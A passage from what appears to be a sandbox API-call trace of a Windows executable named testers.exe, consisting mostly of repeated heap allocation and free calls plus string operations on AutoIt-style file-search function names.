(HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc935b8 [0251.353] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc931a0 [0251.353] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc93180 | out: hHeap=0xc60000) returned 1 [0251.353] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc935d0 [0251.353] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc93588 [0251.353] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc935a0 | out: hHeap=0xc60000) returned 1 [0251.353] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc935a0 [0251.353] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93570 [0251.353] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x3c) returned 0xc722d0 [0251.353] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93558 [0251.353] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93f48 [0251.353] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc93f60 [0251.353] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93f78 [0251.353] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93f90 [0251.365] IUnknown:Release (This=0xc86520) returned 0x0 [0251.365] FreeLibrary (hLibModule=0x290000) returned 1 [0251.365] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79250 | out: hHeap=0xc60000) returned 1 [0251.365] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79238 | out: hHeap=0xc60000) returned 1 [0251.365] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc93940 | out: hHeap=0xc60000) returned 1 [0251.365] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\testers.exe", nBufferLength=0x7fff, lpBuffer=0x87fb80, lpFilePart=0x89fba0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\testers.exe", lpFilePart=0x89fba0*="testers.exe") returned 0x2f [0251.366] CharUpperBuffW (in: lpsz="_FO_FILESEARCH", cchLength=0xe | out: lpsz="_FO_FILESEARCH") returned 0xe [0251.366] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79250 | out: hHeap=0xc60000) returned 1 [0251.366] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd758e0 | out: hHeap=0xc60000) returned 1 [0251.366] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78ae8 | out: hHeap=0xc60000) returned 1 [0251.366] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78680 | out: hHeap=0xc60000) returned 1 [0251.366] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd792f8 | out: hHeap=0xc60000) returned 1 [0251.366] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79310 | out: hHeap=0xc60000) returned 1 [0251.366] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79328 | out: hHeap=0xc60000) returned 1 [0251.366] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79340 | out: hHeap=0xc60000) returned 1 [0251.366] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79358 | out: hHeap=0xc60000) returned 1 [0251.366] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79370 | out: hHeap=0xc60000) returned 1 [0251.366] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79388 | out: hHeap=0xc60000) returned 1 [0251.366] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd793a0 | out: hHeap=0xc60000) returned 1 [0251.366] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd038d8 | out: hHeap=0xc60000) returned 1 [0251.366] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc86548 | out: hHeap=0xc60000) returned 1 [0251.366] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd758d0 | out: hHeap=0xc60000) returned 1 [0251.366] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc86520 | out: hHeap=0xc60000) returned 1 [0251.367] CharUpperBuffW (in: lpsz="_FO_FOLDERSEARCH", cchLength=0x10 | out: lpsz="_FO_FOLDERSEARCH") returned 0x10 [0251.367] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7e668 | out: hHeap=0xc60000) returned 1 [0251.367] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd758d0 | out: hHeap=0xc60000) returned 1 [0251.368] CharUpperBuffW (in: lpsz="_FO_FOLDERSEARCH", cchLength=0x10 | out: lpsz="_FO_FOLDERSEARCH") returned 0x10 [0251.368] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79388 | out: hHeap=0xc60000) returned 1 [0251.368] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd758e0 | out: hHeap=0xc60000) returned 1 [0251.368] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79370 | out: hHeap=0xc60000) returned 1 [0251.368] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79358 | out: hHeap=0xc60000) returned 1 [0251.368] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79340 | out: hHeap=0xc60000) returned 1 [0251.368] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79328 | out: hHeap=0xc60000) returned 1 [0251.368] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79310 | out: hHeap=0xc60000) returned 1 [0251.368] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd792f8 | out: hHeap=0xc60000) returned 1 [0251.368] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78680 | out: hHeap=0xc60000) returned 1 [0251.368] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc86520 | out: hHeap=0xc60000) returned 1 [0251.368] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7e668 | out: hHeap=0xc60000) returned 1 [0251.368] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd758d0 | out: hHeap=0xc60000) returned 1 [0251.368] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xd7e668 [0251.368] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd758d0 [0251.368] CharUpperBuffW (in: lpsz="__FO_FOLDERSEARCHMASK", cchLength=0x15 | out: lpsz="__FO_FOLDERSEARCHMASK") returned 0x15 [0251.368] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7e668 | out: hHeap=0xc60000) returned 1 [0251.368] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd758d0 | out: hHeap=0xc60000) returned 1 [0251.368] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd78680 [0251.368] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd758d0 [0251.368] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd792f8 [0251.368] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd758e0 [0251.368] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd792f8 | out: hHeap=0xc60000) returned 1 [0251.368] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xc86520 [0251.369] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xc86548 [0251.369] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd792f8 [0251.369] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79310 [0251.369] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79328 [0251.369] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79340 [0251.369] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78680 | out: hHeap=0xc60000) returned 1 [0251.369] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xd7e668 [0251.369] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x28) returned 0xd5d120 [0251.369] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd78680 [0251.369] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd75910 [0251.369] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78680 | out: hHeap=0xc60000) returned 1 [0251.369] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xd7e6d8 [0251.369] CharUpperBuffW (in: lpsz="__FO_FOLDERSEARCHMASK", cchLength=0x15 | out: lpsz="__FO_FOLDERSEARCHMASK") returned 0x15 [0251.369] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc86520 | out: hHeap=0xc60000) returned 1 [0251.369] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd758e0 | out: hHeap=0xc60000) returned 1 [0251.369] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd792f8 | out: hHeap=0xc60000) returned 1 [0251.369] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79310 | out: hHeap=0xc60000) returned 1 [0251.369] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79328 | out: hHeap=0xc60000) returned 1 [0251.369] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79340 | out: hHeap=0xc60000) returned 1 [0251.369] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc86548 | out: hHeap=0xc60000) returned 1 [0251.369] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7e668 | out: hHeap=0xc60000) returned 1 [0251.369] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd758d0 | out: hHeap=0xc60000) returned 1 [0251.369] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xd7e668 [0251.369] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd758d0 [0251.370] CharUpperBuffW (in: lpsz="__FO_FOLDERSEARCH", cchLength=0x11 | out: lpsz="__FO_FOLDERSEARCH") returned 0x11 [0251.370] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7e668 | out: hHeap=0xc60000) returned 1 [0251.370] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd758d0 | out: hHeap=0xc60000) returned 1 [0251.370] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79340 [0251.370] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd758d0 [0251.370] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79328 [0251.370] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd758e0 [0251.370] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79328 | out: hHeap=0xc60000) returned 1 [0251.370] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xc86548 [0251.370] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xc86520 [0251.370] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79328 [0251.370] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79310 [0251.370] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd792f8 [0251.370] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd78680 [0251.370] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79340 | out: hHeap=0xc60000) returned 1 [0251.370] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xd7e668 [0251.370] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x28) returned 0xd5d150 [0251.370] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79340 [0251.370] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd75920 [0251.370] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79340 | out: hHeap=0xc60000) returned 1 [0251.370] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xd7e710 [0251.370] CharUpperBuffW (in: lpsz="__FO_FOLDERSEARCH", cchLength=0x11 | out: lpsz="__FO_FOLDERSEARCH") returned 0x11 [0251.370] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc86548 | out: hHeap=0xc60000) returned 1 [0251.370] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd758e0 | out: hHeap=0xc60000) returned 1 [0251.370] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79328 | out: hHeap=0xc60000) returned 1 [0251.371] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79310 | out: hHeap=0xc60000) returned 1 [0251.371] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd792f8 | out: hHeap=0xc60000) returned 1 [0251.371] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78680 | out: hHeap=0xc60000) returned 1 [0251.371] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc86520 | out: hHeap=0xc60000) returned 1 [0251.371] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7e668 | out: hHeap=0xc60000) returned 1 [0251.371] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd758d0 | out: hHeap=0xc60000) returned 1 [0251.371] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xd7e668 [0251.371] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd758d0 [0251.371] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0251.371] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7e668 | out: hHeap=0xc60000) returned 1 [0251.371] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd758d0 | out: hHeap=0xc60000) returned 1 [0251.371] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd78680 [0251.371] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd758d0 [0251.371] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd792f8 [0251.371] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd758e0 [0251.371] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd792f8 | out: hHeap=0xc60000) returned 1 [0251.371] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xc86520 [0251.371] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xc86548 [0251.371] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd792f8 [0251.371] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79310 [0251.371] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79328 [0251.371] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79340 [0251.371] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79358 [0251.371] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79370 [0251.371] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78680 | out: hHeap=0xc60000) returned 1 [0251.372] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xd7e668 [0251.372] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x28) returned 0xd5d180 [0251.372] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd78680 [0251.372] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd75930 [0251.372] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78680 | out: hHeap=0xc60000) returned 1 [0251.372] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xd7e748 [0251.372] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0251.372] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc86520 | out: hHeap=0xc60000) returned 1 [0251.372] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd758e0 | out: hHeap=0xc60000) returned 1 [0251.372] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd792f8 | out: hHeap=0xc60000) returned 1 [0251.372] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79310 | out: hHeap=0xc60000) returned 1 [0251.372] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79328 | out: hHeap=0xc60000) returned 1 [0251.372] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79340 | out: hHeap=0xc60000) returned 1 [0251.372] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79358 | out: hHeap=0xc60000) returned 1 [0251.372] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79370 | out: hHeap=0xc60000) returned 1 [0251.372] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc86548 | out: hHeap=0xc60000) returned 1 [0251.372] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7e668 | out: hHeap=0xc60000) returned 1 [0251.372] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd758d0 | out: hHeap=0xc60000) returned 1 [0251.372] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xd7e668 [0251.372] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd758d0 [0251.372] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0251.372] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7e668 | out: hHeap=0xc60000) returned 1 [0251.372] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd758d0 | out: hHeap=0xc60000) returned 1 [0251.372] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79370 [0251.372] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd758d0 [0251.372] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79358 [0251.372] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd758e0 [0251.373] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xc86548 [0251.373] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79340 [0251.373] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79328 [0251.373] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79370 | out: hHeap=0xc60000) returned 1 [0251.373] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xd7e668 [0251.373] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x28) returned 0xd5d1b0 [0251.373] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79370 [0251.373] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd75940 [0251.373] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79370 | out: hHeap=0xc60000) returned 1 [0251.373] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xd7e780 [0251.373] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0251.373] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79358 | out: hHeap=0xc60000) returned 1 [0251.373] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd758e0 | out: hHeap=0xc60000) returned 1 [0251.373] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79340 | out: hHeap=0xc60000) returned 1 [0251.373] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79328 | out: hHeap=0xc60000) returned 1 [0251.373] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc86548 | out: hHeap=0xc60000) returned 1 [0251.373] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7e668 | out: hHeap=0xc60000) returned 1 [0251.373] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd758d0 | out: hHeap=0xc60000) returned 1 [0251.373] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xd7e668 [0251.373] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd758d0 [0251.373] CharUpperBuffW (in: lpsz="__FO_GETLISTMASK", cchLength=0x10 | out: lpsz="__FO_GETLISTMASK") returned 0x10 [0251.373] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7e668 | out: hHeap=0xc60000) returned 1 [0251.373] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd758d0 | out: hHeap=0xc60000) returned 1 [0251.373] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79328 [0251.373] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd758d0 [0251.373] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79340 [0251.373] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd758e0 [0251.374] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xc86548 [0251.374] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79358 [0251.374] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79370 [0251.374] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79310 [0251.374] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd792f8 [0251.374] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd78680 [0251.374] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79388 [0251.374] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd793a0 [0251.374] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd78ae8 [0251.374] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79328 | out: hHeap=0xc60000) returned 1 [0251.374] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xd7e668 [0251.374] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x28) returned 0xd5d1e0 [0251.374] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79328 [0251.374] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd75950 [0251.374] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79328 | out: hHeap=0xc60000) returned 1 [0251.374] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xd7e7b8 [0251.374] CharUpperBuffW (in: lpsz="__FO_GETLISTMASK", cchLength=0x10 | out: lpsz="__FO_GETLISTMASK") returned 0x10 [0251.374] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79340 | out: hHeap=0xc60000) returned 1 [0251.374] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd758e0 | out: hHeap=0xc60000) returned 1 [0251.374] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79358 | out: hHeap=0xc60000) returned 1 [0251.374] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79370 | out: hHeap=0xc60000) returned 1 [0251.374] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79310 | out: hHeap=0xc60000) returned 1 [0251.374] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd792f8 | out: hHeap=0xc60000) returned 1 [0251.374] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78680 | out: hHeap=0xc60000) returned 1 [0251.374] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79388 | out: hHeap=0xc60000) returned 1 [0251.374] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd793a0 | out: hHeap=0xc60000) returned 1 [0251.375] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78ae8 | out: hHeap=0xc60000) returned 1 [0251.375] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc86548 | out: hHeap=0xc60000) returned 1 [0251.375] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7e668 | out: hHeap=0xc60000) returned 1 [0251.375] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd758d0 | out: hHeap=0xc60000) returned 1 [0251.375] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xd7e668 [0251.375] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd758d0 [0251.375] CharUpperBuffW (in: lpsz="__FO_FILESEARCHTYPE", cchLength=0x13 | out: lpsz="__FO_FILESEARCHTYPE") returned 0x13 [0251.375] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7e668 | out: hHeap=0xc60000) returned 1 [0251.375] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd758d0 | out: hHeap=0xc60000) returned 1 [0251.375] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd78ae8 [0251.375] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd758d0 [0251.375] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd793a0 [0251.375] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd758e0 [0251.375] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd793a0 | out: hHeap=0xc60000) returned 1 [0251.375] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xc86548 [0251.375] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xc86520 [0251.375] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd793a0 [0251.375] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79388 [0251.375] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd78680 [0251.375] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd792f8 [0251.375] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79310 [0251.375] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79370 [0251.375] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79358 [0251.375] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79340 [0251.375] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd78ae8 | out: hHeap=0xc60000) returned 1 [0251.375] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xd7e668 [0251.375] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x28) returned 0xd5d210 [0251.375] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd78ae8 